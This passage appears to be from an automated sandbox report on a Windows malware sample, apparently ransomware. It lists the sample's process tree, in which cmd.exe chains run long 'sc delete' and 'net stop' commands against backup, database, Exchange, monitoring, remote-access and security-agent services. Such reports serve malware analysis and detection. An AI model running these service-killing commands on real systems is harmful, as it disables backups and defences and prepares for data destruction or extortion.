  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8SCMPool
      4⤵
      PID:4560
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8SLReportService
      4⤵
      PID:2184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8TaskService
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8WebPool"
      4⤵
      PID:5096
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UFAllNet
      4⤵
      PID:4680
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UFReportService
      4⤵
      PID:4948
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UTUService
      4⤵
      PID:4556
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8WorkerService1"
      4⤵
      PID:3644
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
    3⤵
    PID:436
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS LoPriv Services"
      4⤵
      PID:4480
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlsv3
      4⤵
      PID:4724
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlses3
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\sc.exe
      sc delete FxService
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UtilDev Web Server Pro"
      4⤵
      PID:4140
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdwks
      4⤵
      PID:280
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdsrv
      4⤵
      PID:4604
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client Guard"
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE FileTranS"
      4⤵
      PID:4504
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client"
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wwbizsrv
      4⤵
      PID:1912
  - - C:\Windows\SysWOW64\sc.exe
      sc delete qemu-ga
      4⤵
      PID:4604
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AlibabaProtect
      4⤵
      PID:4780
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ZTEVdservice
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\sc.exe
      sc delete kbasesrv
      4⤵
      PID:4104
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MMRHookService
      4⤵
      PID:4744
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MsDtsServer100
      4⤵
      PID:4224
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KuaiYunTools
      4⤵
      PID:4860
  - - C:\Windows\SysWOW64\sc.exe
      sc delete btPanel
      4⤵
      PID:1712
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KMSELDI
      4⤵
      PID:4216
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Protect_2345Explorer
      4⤵
      PID:4508
  - - C:\Windows\SysWOW64\sc.exe
      sc delete IpOverUsbSvc
      4⤵
      PID:4900
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 2345PicSvc
      4⤵
      PID:4836
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-agent
      4⤵
      PID:8
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-server
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-worker
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QQCertificateService
      4⤵
      PID:4744
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleRemExecService
      4⤵
      PID:4576
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSUserSvr
      4⤵
      PID:3984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDaemon
      4⤵
      PID:4452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDownSvr
      4⤵
      PID:4912
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSStorageSvr
      4⤵
      PID:4760
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "msftesql$SQLEXPRESS"
        5⤵
        
        PID:4564
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDataProcSvr
      4⤵
      PID:4516
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSGatewaySvr
      4⤵
      PID:5016
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMediaSvr
      4⤵
      PID:4556
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSLoginSvr
      4⤵
      PID:1712
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSTomcat6
      4⤵
      PID:284
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMysqld
      4⤵
      PID:4296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSFtpd
      4⤵
      PID:4528
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Zabbix Agent"
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentAccelerator
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bedbg
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecDeviceMediaService
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecRPCService
      4⤵
      PID:4948
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentBrowser
      4⤵
      PID:2744
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecJobEngine
      4⤵
      PID:3416
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecManagementService
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MDM
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TxQBService
      4⤵
      PID:4736
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Gailun_Downloader
      4⤵
      PID:3612
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFNet
        5⤵
        
        PID:4644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RemoteAssistService
      4⤵
      PID:2184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete YunService
      4⤵
      PID:4488
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Serv-U
      4⤵
      PID:4380
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "EasyFZS Server"
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Rpc Monitor"
      4⤵
      PID:1476
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OpenFastAssist
      4⤵
      PID:4148
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Nuo Update Monitor"
      4⤵
      PID:3008
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Daemon Service"
      4⤵
      PID:4112
  - - C:\Windows\SysWOW64\sc.exe
      sc delete asComSvc
      4⤵
      PID:1380
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OfficeUpdateService
      4⤵
      PID:4808
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RtcSrv
      4⤵
      PID:4716
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCASMCU
      4⤵
      PID:4444
  - - C:\Windows\SysWOW64\sc.exe
      sc delete FTA
      4⤵
      PID:4248
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MASTER
      4⤵
      PID:4660
  - - C:\Windows\SysWOW64\sc.exe
      sc delete NscAuthService
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMUnzipService
      4⤵
      PID:1776
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMAsyncService$maintenance
      4⤵
      PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
    3⤵
    PID:2368
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService1
      4⤵
      PID:4524
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService1
        5⤵
        
        PID:4604
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService2
      4⤵
      PID:4968
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService2
        5⤵
        
        PID:5048
  - - C:\Windows\SysWOW64\net.exe
      net stop "memcached Server"
      4⤵
      PID:4632
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "memcached Server"
        5⤵
        
        PID:4468
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.4
      4⤵
      PID:2732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.4
        5⤵
        
        PID:4940
  - - C:\Windows\SysWOW64\net.exe
      net stop UFIDAWebService
      4⤵
      PID:5012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFIDAWebService
        5⤵
        
        PID:4132
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeADTopology
      4⤵
      PID:4880
  - - C:\Windows\SysWOW64\net.exe
      net stop MSComplianceAudit
      4⤵
      PID:4400
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeAntispamUpdate
      4⤵
      PID:4100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
        5⤵
        
        PID:4336
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeCompliance
      4⤵
      PID:4804
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeCompliance
        5⤵
        
        PID:4652
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDagMgmt
      4⤵
      PID:1544
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDagMgmt
        5⤵
        
        PID:5092
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDelivery
      4⤵
      PID:4100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDelivery
        5⤵
        
        PID:4376
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDiagnostics
      4⤵
      PID:4588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDiagnostics
        5⤵
        
        PID:4396
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeEdgeSync
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeEdgeSync
        5⤵
        
        PID:5056
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFastSearch
      4⤵
      PID:4420
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFastSearch
        5⤵
        
        PID:4148
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFrontEndTransport
      4⤵
      PID:4992
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
        5⤵
        
        PID:4644
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHM
      4⤵
      PID:4948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHM
        5⤵
        
        PID:4904
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SQL2008
      4⤵
      PID:4748
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL2008
        5⤵
        
        PID:5100
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHMRecovery
      4⤵
      PID:8
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHMRecovery
        5⤵
        
        PID:4856
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeImap4
      4⤵
      PID:292
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeImap4
        5⤵
        
        PID:1164
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIMAP4BE
      4⤵
      PID:2732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIMAP4BE
        5⤵
        
        PID:4216
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIS
      4⤵
      PID:4116
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS
        5⤵
        
        PID:4692
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxAssistants
      4⤵
      PID:4436
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
        5⤵
        
        PID:5100
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxReplication
      4⤵
      PID:4500
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxReplication
        5⤵
        
        PID:4988
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeNotificationsBroker
      4⤵
      PID:5076
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
        5⤵
        
        PID:4248
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangePop3
      4⤵
      PID:4948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangePop3
        5⤵
        
        PID:4552
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangePOP3BE
      4⤵
      PID:4688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangePOP3BE
        5⤵
        
        PID:4940
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeRepl
      4⤵
      PID:3440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeRepl
        5⤵
        
        PID:2736
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeRPC
      4⤵
      PID:4772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeRPC
        5⤵
        
        PID:4252
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeServiceHost
      4⤵
      PID:4928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeServiceHost
        5⤵
        
        PID:5020
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeSubmission
      4⤵
      PID:768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeSubmission
        5⤵
        
        PID:4456
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeThrottling
      4⤵
      PID:3416
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeThrottling
        5⤵
        
        PID:4852
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeTransport
      4⤵
      PID:4752
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeTransport
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4112
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeTransportLogSearch
      4⤵
      PID:5044
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeTransportLogSearch
        5⤵
        
        PID:4728
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeUM
      4⤵
      PID:5060
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeUM
        5⤵
        
        PID:8
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeUMCR
      4⤵
      PID:5080
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeUMCR
        5⤵
        
        PID:2320
  - - C:\Windows\SysWOW64\net.exe
      net stop MySQL5_OA
      4⤵
      PID:4304
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL5_OA
        5⤵
        
        PID:5032
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
    3⤵
    PID:2856
  - - C:\Windows\SysWOW64\net.exe
      net stop UIODetect
      4⤵
      PID:4512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UIODetect
        5⤵
        
        PID:4612
  - - C:\Windows\SysWOW64\net.exe
      net stop VMwareHostd
      4⤵
      PID:4996
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMwareHostd
        5⤵
        
        PID:5028
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer8
      4⤵
      Discovers systems in the same network
      PID:4548
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer8
        5⤵
        
        PID:4496
  - - C:\Windows\SysWOW64\net.exe
      net stop VMUSBArbService
      4⤵
      PID:4960
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMUSBArbService
        5⤵
        
        PID:4860
  - - C:\Windows\SysWOW64\net.exe
      net stop VMAuthdService
      4⤵
      PID:4116
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMAuthdService
        5⤵
        
        PID:1812
  - - C:\Windows\SysWOW64\net.exe
      net stop wanxiao-monitor
      4⤵
      PID:4476
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wanxiao-monitor
        5⤵
        
        PID:4644
  - - C:\Windows\SysWOW64\net.exe
      net stop WebAttendServer
      4⤵
      PID:5060
  - - C:\Windows\SysWOW64\net.exe
      net stop mysqltransport
      4⤵
      PID:4396
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mysqltransport
        5⤵
        
        PID:4528
  - - C:\Windows\SysWOW64\net.exe
      net stop VMnetDHCP
      4⤵
      PID:4580
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMnetDHCP
        5⤵
        
        PID:4876
  - - C:\Windows\SysWOW64\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:4536
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:3632
  - - C:\Windows\SysWOW64\net.exe
      net stop Tomcat8
      4⤵
      PID:4668
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Tomcat8
        5⤵
        
        PID:4496
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer
      4⤵
      Discovers systems in the same network
      PID:2156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer
        5⤵
        
        PID:4596
  - - C:\Windows\SysWOW64\net.exe
      net stop QPCore
      4⤵
      PID:2836
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QPCore
        5⤵
        
        PID:4736
  - - C:\Windows\SysWOW64\net.exe
      net stop CASLicenceServer
      4⤵
      PID:4396
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASLicenceServer
        5⤵
        
        PID:4988
  - - C:\Windows\SysWOW64\net.exe
      net stop CASWebServer
      4⤵
      PID:2732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASWebServer
        5⤵
        
        PID:4664
  - - C:\Windows\SysWOW64\net.exe
      net stop AutoUpdateService
      4⤵
      PID:4776
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdateService
        5⤵
        
        PID:2816
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Detect Service"
      4⤵
      PID:5072
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
        5⤵
        
        PID:2736
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Update Service"
      4⤵
      PID:4396
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
        5⤵
        
        PID:3536
  - - C:\Windows\SysWOW64\net.exe
      net stop "AliyunService"
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "AliyunService"
        5⤵
        
        PID:4580
  - - C:\Windows\SysWOW64\net.exe
      net stop CASXMLService
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASXMLService
        5⤵
        
        PID:2816
  - - C:\Windows\SysWOW64\net.exe
      net stop AGSService
      4⤵
      PID:1296
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AGSService
        5⤵
        
        PID:616
  - - C:\Windows\SysWOW64\net.exe
      net stop RapService
      4⤵
      PID:308
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapService
        5⤵
        
        PID:2736
  - - C:\Windows\SysWOW64\net.exe
      net stop DDNSService
      4⤵
      PID:2772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DDNSService
        5⤵
        
        PID:1816
  - - C:\Windows\SysWOW64\net.exe
      net stop iNethinkSQLBackupSvc
      4⤵
      PID:4760
  - - C:\Windows\SysWOW64\net.exe
      net stop CASVirtualDiskService
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASVirtualDiskService
        5⤵
        
        PID:4100
  - - C:\Windows\SysWOW64\net.exe
      net stop CASMsgSrv
      4⤵
      PID:5008
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASMsgSrv
        5⤵
        
        PID:4864
  - - C:\Windows\SysWOW64\net.exe
      net stop "OracleOraDb10g_homeliSQL*Plus"
      4⤵
      PID:5060
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"
        5⤵
        
        PID:1804
  - - C:\Windows\SysWOW64\net.exe
      net stop OracleDBConsoleilas
      4⤵
      PID:4516
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop OracleDBConsoleilas
        5⤵
        
        PID:4144
  - - C:\Windows\SysWOW64\net.exe
      net stop MySQL
      4⤵
      PID:1056
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL
        5⤵
        
        PID:4744
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdAppService1220
      4⤵
      PID:2816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1220
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdTaskService1220
      4⤵
      PID:1628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1220
        5⤵
        
        PID:4704
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdUpgradeService1220
      4⤵
      PID:4232
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdUpgradeService1220
        5⤵
        
        PID:4436
  - - C:\Windows\SysWOW64\net.exe
      net stop K3MobileServiceManage
      4⤵
      PID:1380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop K3MobileServiceManage
        5⤵
        
        PID:1744
  - - C:\Windows\SysWOW64\net.exe
      net stop "FileZilla Server"
      4⤵
      PID:3060
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "FileZilla Server"
        5⤵
        
        PID:1396
  - - C:\Windows\SysWOW64\net.exe
      net stop DDVRulesProcessor
      4⤵
      PID:1496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DDVRulesProcessor
        5⤵
        
        PID:4428
  - - C:\Windows\SysWOW64\net.exe
      net stop ImtsEventSvr
      4⤵
      PID:4656
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ImtsEventSvr
        5⤵
        
        PID:5092
  - - C:\Windows\SysWOW64\net.exe
      net stop AutoUpdatePatchService
      4⤵
      PID:3688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdatePatchService
        5⤵
        
        PID:5000
  - - C:\Windows\SysWOW64\net.exe
      net stop OMAILREPORT
      4⤵
      PID:768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop OMAILREPORT
        5⤵
        
        PID:1968
  - - C:\Windows\SysWOW64\net.exe
      net stop "Dell Hardware Support"
      4⤵
      PID:2336
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Dell Hardware Support"
        5⤵
        
        PID:3556
  - - C:\Windows\SysWOW64\net.exe
      net stop SupportAssistAgent
      4⤵
      PID:4940
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SupportAssistAgent
        5⤵
        
